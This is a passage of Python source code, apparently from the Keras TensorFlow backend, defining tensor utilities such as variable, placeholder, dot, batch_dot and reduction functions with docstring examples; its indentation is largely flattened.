>>> b = K.placeholder((2, 2), sparse=True)
>>> print(K.is_sparse(b))
True
>>> c = K.to_dense(b)
>>> print(K.is_sparse(c))
False
```
"""
if is_sparse(tensor):
return sparse_ops.sparse_tensor_to_dense(tensor)
else:
return tensor
name_scope = ops.name_scope
@keras_export('keras.backend.variable')
def variable(value, dtype=None, name=None, constraint=None):
"""Instantiates a variable and returns it.
Arguments:
value: Numpy array, initial value of the tensor.
dtype: Tensor type.
name: Optional name string for the tensor.
constraint: Optional projection function to be
applied to the variable after an optimizer update.
Returns:
A variable instance (with Keras metadata included).
Examples:
```python
>>> import numpy as np
>>> from keras import backend as K
>>> val = np.array([[1, 2], [3, 4]])
>>> kvar = K.variable(value=val, dtype='float64', name='example_var')
>>> K.dtype(kvar)
'float64'
>>> print(kvar)
example_var
>>> kvar.eval()
array([[ 1., 2.],
[ 3., 4.]])
```
"""
if dtype is None:
dtype = floatx()
if hasattr(value, 'tocoo'):
sparse_coo = value.tocoo()
indices = np.concatenate((np.expand_dims(sparse_coo.row, 1), np.expand_dims(
sparse_coo.col, 1)), 1)
v = sparse_tensor.SparseTensor(
indices=indices, values=sparse_coo.data, dense_shape=sparse_coo.shape)
v._keras_shape = sparse_coo.shape
return v
v = resource_variable_ops.ResourceVariable(
value,
dtype=dtypes_module.as_dtype(dtype),
name=name,
constraint=constraint)
if isinstance(value, np.ndarray):
v._keras_shape = value.shape
elif hasattr(value, 'shape'):
v._keras_shape = int_shape(value)
track_variable(v)
return v
def track_tf_optimizer(tf_optimizer):
"""Tracks the given TF optimizer for initialization of its variables."""
if context.executing_eagerly():
return
graph = get_graph()
optimizers = _GRAPH_TF_OPTIMIZERS.setdefault(graph, weakref.WeakSet())
optimizers.add(tf_optimizer)
def track_variable(v):
"""Tracks the given variable for initialization."""
if context.executing_eagerly():
return
graph = v.graph if hasattr(v, 'graph') else get_graph()
if graph not in _GRAPH_VARIABLES:
_GRAPH_VARIABLES[graph] = weakref.WeakSet()
_GRAPH_VARIABLES[graph].add(v)
def _get_variables(graph=None):
"""Returns variables corresponding to the given graph for initialization."""
assert not context.executing_eagerly()
variables = _GRAPH_VARIABLES.setdefault(graph, weakref.WeakSet())
for opt in _GRAPH_TF_OPTIMIZERS.get(graph, set()):
variables.update(opt.optimizer.variables())
return variables
def _initialize_variables(session):
"""Utility to initialize uninitialized variables on the fly."""
variables = _get_variables(get_graph())
candidate_vars = []
for v in variables:
if not getattr(v, '_keras_initialized', False):
candidate_vars.append(v)
if candidate_vars:
# This step is expensive, so we only run it on variables not already
# marked as initialized.
is_initialized = session.run(
[variables_module.is_variable_initialized(v) for v in candidate_vars])
uninitialized_vars = []
for flag, v in zip(is_initialized, candidate_vars):
if not flag:
uninitialized_vars.append(v)
v._keras_initialized = True
if uninitialized_vars:
session.run(variables_module.variables_initializer(uninitialized_vars))
@keras_export('keras.backend.constant')
def constant(value, dtype=None, shape=None, name=None):
"""Creates a constant tensor.
Arguments:
value: A constant value (or list)
dtype: The type of the elements of the resulting tensor.
shape: Optional dimensions of resulting tensor.
name: Optional name for the tensor.
Returns:
A Constant Tensor.
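Example (illustrative):
```python
>>> from keras import backend as K
>>> kconst = K.constant([1., 2., 3.])  # rank-1 constant tensor of dtype floatx()
>>> K.int_shape(kconst)
(3,)
```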
"""
if dtype is None:
dtype = floatx()
# If the outer context is eager but we are executing under the keras
# FuncGraph, we create EagerTensors and use them as constants.
if (ops.executing_eagerly_outside_functions() and
getattr(get_graph(), 'name', '') == 'keras_graph'):
with ops.init_scope():
return constant_op.constant(value, dtype=dtype, shape=shape, name=name)
return constant_op.constant(value, dtype=dtype, shape=shape, name=name)
def is_keras_tensor(x):
"""Returns whether `x` is a Keras tensor.
A "Keras tensor" is a tensor that was returned by a Keras layer,
(`Layer` class) or by `Input`.
Arguments:
x: A candidate tensor.
Returns:
A boolean: Whether the argument is a Keras tensor.
Raises:
ValueError: In case `x` is not a symbolic tensor.
Examples:
```python
>>> import tensorflow as tf
>>> import numpy
>>> from keras import backend as K
>>> from keras.layers import Input, Dense
>>> np_var = numpy.array([1, 2])
>>> K.is_keras_tensor(np_var) # A numpy array is not a symbolic tensor.
ValueError
>>> k_var = tf.placeholder('float32', shape=(1,1))
>>> K.is_keras_tensor(k_var) # A variable indirectly created outside of
keras is not a Keras tensor.
False
>>> keras_var = K.variable(np_var)
>>> K.is_keras_tensor(keras_var) # A variable created with the keras
backend is not a Keras tensor.
False
>>> keras_placeholder = K.placeholder(shape=(2, 4, 5))
>>> K.is_keras_tensor(keras_placeholder) # A placeholder is not a Keras
tensor.
False
>>> keras_input = Input([10])
>>> K.is_keras_tensor(keras_input) # An Input is a Keras tensor.
True
>>> keras_layer_output = Dense(10)(keras_input)
>>> K.is_keras_tensor(keras_layer_output) # Any Keras layer output is a
Keras tensor.
True
```
"""
if not isinstance(x, (ops.Tensor,
variables_module.Variable,
sparse_tensor.SparseTensor)):
raise ValueError('Unexpectedly found an instance of type `' + str(type(x)) +
'`. Expected a symbolic tensor instance.')
return hasattr(x, '_keras_history')
@keras_export('keras.backend.placeholder')
def placeholder(shape=None, ndim=None, dtype=None, sparse=False, name=None):
"""Instantiates a placeholder tensor and returns it.
Arguments:
shape: Shape of the placeholder
(integer tuple, may include `None` entries).
ndim: Number of axes of the tensor.
At least one of {`shape`, `ndim`} must be specified.
If both are specified, `shape` is used.
dtype: Placeholder type.
sparse: Boolean, whether the placeholder should have a sparse type.
name: Optional name string for the placeholder.
Raises:
ValueError: If called with eager execution.
Returns:
Tensor instance (with Keras metadata included).
Examples:
```python
>>> from keras import backend as K
>>> input_ph = K.placeholder(shape=(2, 4, 5))
>>> input_ph
<tf.Tensor 'Placeholder_4:0' shape=(2, 4, 5) dtype=float32>
```
"""
if dtype is None:
dtype = floatx()
if not shape:
if ndim:
shape = tuple([None for _ in range(ndim)])
with get_graph().as_default():
if sparse:
x = array_ops.sparse_placeholder(dtype, shape=shape, name=name)
else:
x = array_ops.placeholder(dtype, shape=shape, name=name)
return x
def is_placeholder(x):
"""Returns whether `x` is a placeholder.
Arguments:
x: A candidate placeholder.
Returns:
Boolean.
"""
try:
return x.op.type == 'Placeholder'
except AttributeError:
return False
@keras_export('keras.backend.shape')
def shape(x):
"""Returns the symbolic shape of a tensor or variable.
Arguments:
x: A tensor or variable.
Returns:
A symbolic shape (which is itself a tensor).
Examples:
```python
# TensorFlow example
>>> from keras import backend as K
>>> tf_session = K.get_session()
>>> val = np.array([[1, 2], [3, 4]])
>>> kvar = K.variable(value=val)
>>> input = keras.backend.placeholder(shape=(2, 4, 5))
>>> K.shape(kvar)
<tf.Tensor 'Shape_8:0' shape=(2,) dtype=int32>
>>> K.shape(input)
<tf.Tensor 'Shape_9:0' shape=(3,) dtype=int32>
# To get integer shape (Instead, you can use K.int_shape(x))
>>> K.shape(kvar).eval(session=tf_session)
array([2, 2], dtype=int32)
>>> K.shape(input).eval(session=tf_session)
array([2, 4, 5], dtype=int32)
```
"""
return array_ops.shape(x)
@keras_export('keras.backend.int_shape')
def int_shape(x):
"""Returns the shape of tensor or variable as a tuple of int or None entries.
Arguments:
x: Tensor or variable.
Returns:
A tuple of integers (or None entries).
Examples:
```python
>>> from keras import backend as K
>>> input = K.placeholder(shape=(2, 4, 5))
>>> K.int_shape(input)
(2, 4, 5)
>>> val = np.array([[1, 2], [3, 4]])
>>> kvar = K.variable(value=val)
>>> K.int_shape(kvar)
(2, 2)
```
"""
try:
shape = x.shape
if not isinstance(shape, tuple):
shape = tuple(shape.as_list())
return shape
except ValueError:
return None
@keras_export('keras.backend.ndim')
def ndim(x):
"""Returns the number of axes in a tensor, as an integer.
Arguments:
x: Tensor or variable.
Returns:
Integer (scalar), number of axes.
Examples:
```python
>>> from keras import backend as K
>>> input = K.placeholder(shape=(2, 4, 5))
>>> val = np.array([[1, 2], [3, 4]])
>>> kvar = K.variable(value=val)
>>> K.ndim(input)
3
>>> K.ndim(kvar)
2
```
"""
dims = x.shape._dims
if dims is not None:
return len(dims)
return None
@keras_export('keras.backend.dtype')
def dtype(x):
"""Returns the dtype of a Keras tensor or variable, as a string.
Arguments:
x: Tensor or variable.
Returns:
String, dtype of `x`.
Examples:
```python
>>> from keras import backend as K
>>> K.dtype(K.placeholder(shape=(2,4,5)))
'float32'
>>> K.dtype(K.placeholder(shape=(2,4,5), dtype='float32'))
'float32'
>>> K.dtype(K.placeholder(shape=(2,4,5), dtype='float64'))
'float64'
# Keras variable
>>> kvar = K.variable(np.array([[1, 2], [3, 4]]))
>>> K.dtype(kvar)
'float32'
>>> kvar = K.variable(np.array([[1, 2], [3, 4]]), dtype='float32')
>>> K.dtype(kvar)
'float32'
```
"""
return x.dtype.base_dtype.name
@keras_export('keras.backend.eval')
def eval(x):
"""Evaluates the value of a variable.
Arguments:
x: A variable.
Returns:
A Numpy array.
Examples:
```python
>>> from keras import backend as K
>>> kvar = K.variable(np.array([[1, 2], [3, 4]]), dtype='float32')
>>> K.eval(kvar)
array([[ 1., 2.],
[ 3., 4.]], dtype=float32)
```
"""
return get_value(to_dense(x))
@keras_export('keras.backend.zeros')
def zeros(shape, dtype=None, name=None):
"""Instantiates an all-zeros variable and returns it.
Arguments:
shape: Tuple of integers, shape of returned Keras variable
dtype: String, data type of returned Keras variable
name: String, name of returned Keras variable
Returns:
A variable (including Keras metadata), filled with `0.0`.
Note that if `shape` was symbolic, we cannot return a variable,
and will return a dynamically-shaped tensor instead.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.zeros((3,4))
>>> K.eval(kvar)
array([[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.]], dtype=float32)
```
"""
with ops.init_scope():
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
v = array_ops.zeros(shape=shape, dtype=tf_dtype, name=name)
if py_all(v.shape.as_list()):
return variable(v, dtype=dtype, name=name)
track_variable(v)
return v
@keras_export('keras.backend.ones')
def ones(shape, dtype=None, name=None):
"""Instantiates an all-ones variable and returns it.
Arguments:
shape: Tuple of integers, shape of returned Keras variable.
dtype: String, data type of returned Keras variable.
name: String, name of returned Keras variable.
Returns:
A Keras variable, filled with `1.0`.
Note that if `shape` was symbolic, we cannot return a variable,
and will return a dynamically-shaped tensor instead.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.ones((3,4))
>>> K.eval(kvar)
array([[ 1., 1., 1., 1.],
[ 1., 1., 1., 1.],
[ 1., 1., 1., 1.]], dtype=float32)
```
"""
with ops.init_scope():
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
v = array_ops.ones(shape=shape, dtype=tf_dtype, name=name)
if py_all(v.shape.as_list()):
return variable(v, dtype=dtype, name=name)
track_variable(v)
return v
@keras_export('keras.backend.eye')
def eye(size, dtype=None, name=None):
"""Instantiate an identity matrix and returns it.
Arguments:
size: Integer, number of rows/columns.
dtype: String, data type of returned Keras variable.
name: String, name of returned Keras variable.
Returns:
A Keras variable, an identity matrix.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.eye(3)
>>> K.eval(kvar)
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]], dtype=float32)
```
"""
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
return variable(linalg_ops.eye(size, dtype=tf_dtype), dtype, name)
@keras_export('keras.backend.zeros_like')
def zeros_like(x, dtype=None, name=None):
"""Instantiates an all-zeros variable of the same shape as another tensor.
Arguments:
x: Keras variable or Keras tensor.
dtype: String, dtype of returned Keras variable.
None uses the dtype of x.
name: String, name for the variable to create.
Returns:
A Keras variable with the shape of x filled with zeros.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.variable(np.random.random((2,3)))
>>> kvar_zeros = K.zeros_like(kvar)
>>> K.eval(kvar_zeros)
array([[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
```
"""
return array_ops.zeros_like(x, dtype=dtype, name=name)
@keras_export('keras.backend.ones_like')
def ones_like(x, dtype=None, name=None):
"""Instantiates an all-ones variable of the same shape as another tensor.
Arguments:
x: Keras variable or tensor.
dtype: String, dtype of returned Keras variable.
None uses the dtype of x.
name: String, name for the variable to create.
Returns:
A Keras variable with the shape of x filled with ones.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.variable(np.random.random((2,3)))
>>> kvar_ones = K.ones_like(kvar)
>>> K.eval(kvar_ones)
array([[ 1., 1., 1.],
[ 1., 1., 1.]], dtype=float32)
```
"""
return array_ops.ones_like(x, dtype=dtype, name=name)
def identity(x, name=None):
"""Returns a tensor with the same content as the input tensor.
Arguments:
x: The input tensor.
name: String, name for the variable to create.
Returns:
A tensor of the same shape, type and content.
"""
return array_ops.identity(x, name=name)
@keras_export('keras.backend.random_uniform_variable')
def random_uniform_variable(shape, low, high, dtype=None, name=None, seed=None):
"""Instantiates a variable with values drawn from a uniform distribution.
Arguments:
shape: Tuple of integers, shape of returned Keras variable.
low: Float, lower boundary of the output interval.
high: Float, upper boundary of the output interval.
dtype: String, dtype of returned Keras variable.
name: String, name of returned Keras variable.
seed: Integer, random seed.
Returns:
A Keras variable, filled with drawn samples.
Example:
```python
# TensorFlow example
>>> kvar = K.random_uniform_variable((2,3), 0, 1)
>>> kvar
<tensorflow.python.ops.variables.Variable object at 0x10ab40b10>
>>> K.eval(kvar)
array([[ 0.10940075, 0.10047495, 0.476143 ],
[ 0.66137183, 0.00869417, 0.89220798]], dtype=float32)
```
"""
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e8)
value = init_ops.random_uniform_initializer(
low, high, dtype=tf_dtype, seed=seed)(shape)
return variable(value, dtype=dtype, name=name)
@keras_export('keras.backend.random_normal_variable')
def random_normal_variable(shape, mean, scale, dtype=None, name=None,
seed=None):
"""Instantiates a variable with values drawn from a normal distribution.
Arguments:
shape: Tuple of integers, shape of returned Keras variable.
mean: Float, mean of the normal distribution.
scale: Float, standard deviation of the normal distribution.
dtype: String, dtype of returned Keras variable.
name: String, name of returned Keras variable.
seed: Integer, random seed.
Returns:
A Keras variable, filled with drawn samples.
Example:
```python
# TensorFlow example
>>> kvar = K.random_normal_variable((2,3), 0, 1)
>>> kvar
<tensorflow.python.ops.variables.Variable object at 0x10ab12dd0>
>>> K.eval(kvar)
array([[ 1.19591331, 0.68685907, -0.63814116],
[ 0.92629528, 0.28055015, 1.70484698]], dtype=float32)
```
"""
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e8)
value = init_ops.random_normal_initializer(
mean, scale, dtype=tf_dtype, seed=seed)(shape)
return variable(value, dtype=dtype, name=name)
@keras_export('keras.backend.count_params')
def count_params(x):
"""Returns the static number of elements in a variable or tensor.
Arguments:
x: Variable or tensor.
Returns:
Integer, the number of scalars in `x`.
Example:
```python
>>> kvar = K.zeros((2,3))
>>> K.count_params(kvar)
6
>>> K.eval(kvar)
array([[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
```
"""
return np.prod(x.shape.as_list())
@keras_export('keras.backend.cast')
def cast(x, dtype):
"""Casts a tensor to a different dtype and returns it.
You can cast a Keras variable but it still returns a Keras tensor.
Arguments:
x: Keras tensor (or variable).
dtype: String, either (`'float16'`, `'float32'`, or `'float64'`).
Returns:
Keras tensor with dtype `dtype`.
Example:
```python
>>> from keras import backend as K
>>> input = K.placeholder((2, 3), dtype='float32')
>>> input
<tf.Tensor 'Placeholder_2:0' shape=(2, 3) dtype=float32>
# It doesn't work in-place as below.
>>> K.cast(input, dtype='float16')
<tf.Tensor 'Cast_1:0' shape=(2, 3) dtype=float16>
>>> input
<tf.Tensor 'Placeholder_2:0' shape=(2, 3) dtype=float32>
# you need to assign it.
>>> input = K.cast(input, dtype='float16')
>>> input
<tf.Tensor 'Cast_2:0' shape=(2, 3) dtype=float16>
```
"""
return math_ops.cast(x, dtype)
# UPDATES OPS
@keras_export('keras.backend.update')
def update(x, new_x):
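  """Update the value of `x` to `new_x`.
  Arguments:
      x: A Variable.
      new_x: A tensor of same shape as `x`.
  Returns:
      The variable `x` updated.
  """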
return state_ops.assign(x, new_x)
@keras_export('keras.backend.update_add')
def update_add(x, increment):
"""Update the value of `x` by adding `increment`.
Arguments:
x: A Variable.
increment: A tensor of same shape as `x`.
Returns:
The variable `x` updated.
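  Example:
  A minimal sketch (the tensors below are illustrative; array formatting
  may differ across NumPy versions):
  ```python
      >>> x = K.variable([1., 2.])  # illustrative values
      >>> K.eval(K.update_add(x, K.constant([3., 4.])))
      array([ 4.,  6.], dtype=float32)
  ```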
"""
return state_ops.assign_add(x, increment)
@keras_export('keras.backend.update_sub')
def update_sub(x, decrement):
"""Update the value of `x` by subtracting `decrement`.
Arguments:
x: A Variable.
decrement: A tensor of same shape as `x`.
Returns:
The variable `x` updated.
"""
return state_ops.assign_sub(x, decrement)
@keras_export('keras.backend.moving_average_update')
def moving_average_update(x, value, momentum):
"""Compute the moving average of a variable.
Arguments:
x: A Variable.
      value: A tensor with the same shape as `x`.
momentum: The moving average momentum.
Returns:
An Operation to update the variable.
"""
# `training` is higher-up than the Keras backend in the abstraction hierarchy.
# In particular, `training` depends on layers, and thus on Keras.
# moving_averages, being low-level ops, should not be part of the training
# module.
from tensorflow.python.training import moving_averages # pylint: disable=g-import-not-at-top
return moving_averages.assign_moving_average(
x, value, momentum, zero_debias=True)
# LINEAR ALGEBRA
@keras_export('keras.backend.dot')
def dot(x, y):
"""Multiplies 2 tensors (and/or variables) and returns a *tensor*.
  When attempting to multiply an nD tensor
  with an nD tensor, it reproduces the Theano behavior
  (e.g. `(2, 3) * (4, 3, 5) -> (2, 4, 5)`).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A tensor, dot product of `x` and `y`.
Examples:
```python
# dot product between tensors
>>> x = K.placeholder(shape=(2, 3))
>>> y = K.placeholder(shape=(3, 4))
>>> xy = K.dot(x, y)
>>> xy
<tf.Tensor 'MatMul_9:0' shape=(2, 4) dtype=float32>
```
```python
# dot product between tensors
>>> x = K.placeholder(shape=(32, 28, 3))
>>> y = K.placeholder(shape=(3, 4))
>>> xy = K.dot(x, y)
>>> xy
<tf.Tensor 'MatMul_9:0' shape=(32, 28, 4) dtype=float32>
```
```python
# Theano-like behavior example
>>> x = K.random_uniform_variable(shape=(2, 3), low=0, high=1)
>>> y = K.ones((4, 3, 5))
>>> xy = K.dot(x, y)
>>> K.int_shape(xy)
(2, 4, 5)
```
"""
if ndim(x) is not None and (ndim(x) > 2 or ndim(y) > 2):
x_shape = []
for i, s in zip(int_shape(x), array_ops.unstack(array_ops.shape(x))):
if i is not None:
x_shape.append(i)
else:
x_shape.append(s)
x_shape = tuple(x_shape)
y_shape = []
for i, s in zip(int_shape(y), array_ops.unstack(array_ops.shape(y))):
if i is not None:
y_shape.append(i)
else:
y_shape.append(s)
y_shape = tuple(y_shape)
y_permute_dim = list(range(ndim(y)))
y_permute_dim = [y_permute_dim.pop(-2)] + y_permute_dim
xt = array_ops.reshape(x, [-1, x_shape[-1]])
yt = array_ops.reshape(
array_ops.transpose(y, perm=y_permute_dim), [y_shape[-2], -1])
return array_ops.reshape(
math_ops.matmul(xt, yt), x_shape[:-1] + y_shape[:-2] + y_shape[-1:])
if is_sparse(x):
out = sparse_ops.sparse_tensor_dense_matmul(x, y)
else:
out = math_ops.matmul(x, y)
return out
@keras_export('keras.backend.batch_dot')
def batch_dot(x, y, axes=None):
"""Batchwise dot product.
  `batch_dot` is used to compute the dot product of `x` and `y` when
  `x` and `y` are data in batches, i.e. in a shape of
  `(batch_size, :)`.
  `batch_dot` results in a tensor or variable with fewer dimensions
  than the input. If the number of dimensions is reduced to 1,
  we use `expand_dims` to make sure that ndim is at least 2.
Arguments:
x: Keras tensor or variable with `ndim >= 2`.
y: Keras tensor or variable with `ndim >= 2`.
axes: list of (or single) int with target dimensions.
The lengths of `axes[0]` and `axes[1]` should be the same.
Returns:
A tensor with shape equal to the concatenation of `x`'s shape
(less the dimension that was summed over) and `y`'s shape
(less the batch dimension and the dimension that was summed over).
If the final rank is 1, we reshape it to `(batch_size, 1)`.
Examples:
Assume `x = [[1, 2], [3, 4]]` and `y = [[5, 6], [7, 8]]`
  `batch_dot(x, y, axes=1) = [[17], [53]]` which is the main diagonal
of `x.dot(y.T)`, although we never have to calculate the off-diagonal
elements.
Shape inference:
Let `x`'s shape be `(100, 20)` and `y`'s shape be `(100, 30, 20)`.
  If `axes` is (1, 2), to find the output shape of the resultant tensor,
  loop through each dimension in `x`'s shape and `y`'s shape:
  * `x.shape[0]` : 100 : append to output shape
  * `x.shape[1]` : 20 : do not append to output shape,
      dimension 1 of `x` has been summed over. (`axes[0]` = 1)
  * `y.shape[0]` : 100 : do not append to output shape,
      always ignore first dimension of `y`
  * `y.shape[1]` : 30 : append to output shape
  * `y.shape[2]` : 20 : do not append to output shape,
      dimension 2 of `y` has been summed over. (`axes[1]` = 2)
`output_shape` = `(100, 30)`
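  For instance, the shape inference above can be checked directly
  (an illustrative sketch; `K` is the backend module as in the other
  examples):
  ```python
      >>> x = K.ones(shape=(100, 20))   # illustrative shapes
      >>> y = K.ones(shape=(100, 30, 20))
      >>> K.int_shape(K.batch_dot(x, y, axes=(1, 2)))
      (100, 30)
  ```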
```python
>>> x_batch = K.ones(shape=(32, 20, 1))
>>> y_batch = K.ones(shape=(32, 30, 20))
>>> xy_batch_dot = K.batch_dot(x_batch, y_batch, axes=[1, 2])
>>> K.int_shape(xy_batch_dot)
(32, 1, 30)
```
"""
if isinstance(axes, int):
axes = (axes, axes)
x_ndim = ndim(x)
y_ndim = ndim(y)
if axes is None:
# behaves like tf.batch_matmul as default
axes = [x_ndim - 1, y_ndim - 2]
if x_ndim > y_ndim:
diff = x_ndim - y_ndim
y = array_ops.reshape(y,
array_ops.concat(
[array_ops.shape(y), [1] * (diff)], axis=0))
elif y_ndim > x_ndim:
diff = y_ndim - x_ndim
x = array_ops.reshape(x,
array_ops.concat(
[array_ops.shape(x), [1] * (diff)], axis=0))
else:
diff = 0
if ndim(x) == 2 and ndim(y) == 2:
if axes[0] == axes[1]:
out = math_ops.reduce_sum(math_ops.multiply(x, y), axes[0])
else:
out = math_ops.reduce_sum(
math_ops.multiply(array_ops.transpose(x, [1, 0]), y), axes[1])
else:
adj_x = None if axes[0] == ndim(x) - 1 else True
adj_y = True if axes[1] == ndim(y) - 1 else None
out = math_ops.matmul(x, y, adjoint_a=adj_x, adjoint_b=adj_y)
if diff:
if x_ndim > y_ndim:
idx = x_ndim + y_ndim - 3
else:
idx = x_ndim - 1
out = array_ops.squeeze(out, list(range(idx, idx + diff)))
if ndim(out) == 1:
out = expand_dims(out, 1)
return out
@keras_export('keras.backend.transpose')
def transpose(x):
"""Transposes a tensor and returns it.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
Examples:
```python
>>> var = K.variable([[1, 2, 3], [4, 5, 6]])
>>> K.eval(var)
array([[ 1., 2., 3.],
[ 4., 5., 6.]], dtype=float32)
>>> var_transposed = K.transpose(var)
>>> K.eval(var_transposed)
array([[ 1., 4.],
[ 2., 5.],
[ 3., 6.]], dtype=float32)
```
```python
>>> input = K.placeholder((2, 3))
>>> input
<tf.Tensor 'Placeholder_11:0' shape=(2, 3) dtype=float32>
>>> input_transposed = K.transpose(input)
>>> input_transposed
<tf.Tensor 'transpose_4:0' shape=(3, 2) dtype=float32>
```
"""
return array_ops.transpose(x)
@keras_export('keras.backend.gather')
def gather(reference, indices):
"""Retrieves the elements of indices `indices` in the tensor `reference`.
Arguments:
reference: A tensor.
indices: An integer tensor of indices.
Returns:
A tensor of same type as `reference`.
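  Example:
  A small sketch with made-up values (array formatting may vary):
  ```python
      >>> var = K.variable([[1., 2.], [3., 4.], [5., 6.]])
      >>> K.eval(K.gather(var, [0, 2]))
      array([[ 1.,  2.],
             [ 5.,  6.]], dtype=float32)
  ```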
"""
return array_ops.gather(reference, indices)
# ELEMENT-WISE OPERATIONS
@keras_export('keras.backend.max')
def max(x, axis=None, keepdims=False):
"""Maximum value in a tensor.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to find maximum values.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with maximum values of `x`.
"""
return math_ops.reduce_max(x, axis, keepdims)
@keras_export('keras.backend.min')
def min(x, axis=None, keepdims=False):
"""Minimum value in a tensor.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to find minimum values.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with minimum values of `x`.
"""
return math_ops.reduce_min(x, axis, keepdims)
@keras_export('keras.backend.sum')
def sum(x, axis=None, keepdims=False):
"""Sum of the values in a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to sum over.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with sum of `x`.
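  Example:
  An illustrative sketch of `axis` and `keepdims` (values are made up):
  ```python
      >>> x = K.constant([[1., 2.], [3., 4.]])
      >>> K.eval(K.sum(x, axis=1))
      array([ 3.,  7.], dtype=float32)
      >>> K.eval(K.sum(x, axis=1, keepdims=True))
      array([[ 3.],
             [ 7.]], dtype=float32)
  ```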
"""
return math_ops.reduce_sum(x, axis, keepdims)
@keras_export('keras.backend.prod')
def prod(x, axis=None, keepdims=False):
"""Multiplies the values in a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the product.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with the product of elements of `x`.
"""
return math_ops.reduce_prod(x, axis, keepdims)
@keras_export('keras.backend.cumsum')
def cumsum(x, axis=0):
"""Cumulative sum of the values in a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the sum.
Returns:
A tensor of the cumulative sum of values of `x` along `axis`.
"""
return math_ops.cumsum(x, axis=axis)
@keras_export('keras.backend.cumprod')
def cumprod(x, axis=0):
"""Cumulative product of the values in a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the product.
Returns:
A tensor of the cumulative product of values of `x` along `axis`.
"""
return math_ops.cumprod(x, axis=axis)
@keras_export('keras.backend.var')
def var(x, axis=None, keepdims=False):
"""Variance of a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the variance.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with the variance of elements of `x`.
"""
if x.dtype.base_dtype == dtypes_module.bool:
x = math_ops.cast(x, floatx())
return math_ops.reduce_variance(x, axis=axis, keepdims=keepdims)
@keras_export('keras.backend.std')
def std(x, axis=None, keepdims=False):
"""Standard deviation of a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the standard deviation.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with the standard deviation of elements of `x`.
"""
if x.dtype.base_dtype == dtypes_module.bool:
x = math_ops.cast(x, floatx())
return math_ops.reduce_std(x, axis=axis, keepdims=keepdims)
@keras_export('keras.backend.mean')
def mean(x, axis=None, keepdims=False):
"""Mean of a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: A list of integer. Axes to compute the mean.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1 for each entry in `axis`. If `keepdims` is `True`,
the reduced dimensions are retained with length 1.
Returns:
A tensor with the mean of elements of `x`.
"""
if x.dtype.base_dtype == dtypes_module.bool:
x = math_ops.cast(x, floatx())
return math_ops.reduce_mean(x, axis, keepdims)
@keras_export('keras.backend.any')
def any(x, axis=None, keepdims=False):
"""Bitwise reduction (logical OR).
Arguments:
x: Tensor or variable.
axis: axis along which to perform the reduction.
      keepdims: whether to drop or broadcast the reduction axes.
  Returns:
      A bool tensor.
"""
x = math_ops.cast(x, dtypes_module.bool)
return math_ops.reduce_any(x, axis, keepdims)
@keras_export('keras.backend.all')
def all(x, axis=None, keepdims=False):
"""Bitwise reduction (logical AND).
Arguments:
x: Tensor or variable.
axis: axis along which to perform the reduction.
      keepdims: whether to drop or broadcast the reduction axes.
  Returns:
      A bool tensor.
"""
x = math_ops.cast(x, dtypes_module.bool)
return math_ops.reduce_all(x, axis, keepdims)
@keras_export('keras.backend.argmax')
def argmax(x, axis=-1):
"""Returns the index of the maximum value along an axis.
Arguments:
x: Tensor or variable.
axis: axis along which to perform the reduction.
Returns:
A tensor.
"""
return math_ops.argmax(x, axis)
@keras_export('keras.backend.argmin')
def argmin(x, axis=-1):
"""Returns the index of the minimum value along an axis.
Arguments:
x: Tensor or variable.
axis: axis along which to perform the reduction.
Returns:
A tensor.
"""
return math_ops.argmin(x, axis)
@keras_export('keras.backend.square')
def square(x):
"""Element-wise square.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.square(x)
@keras_export('keras.backend.abs')
def abs(x):
"""Element-wise absolute value.
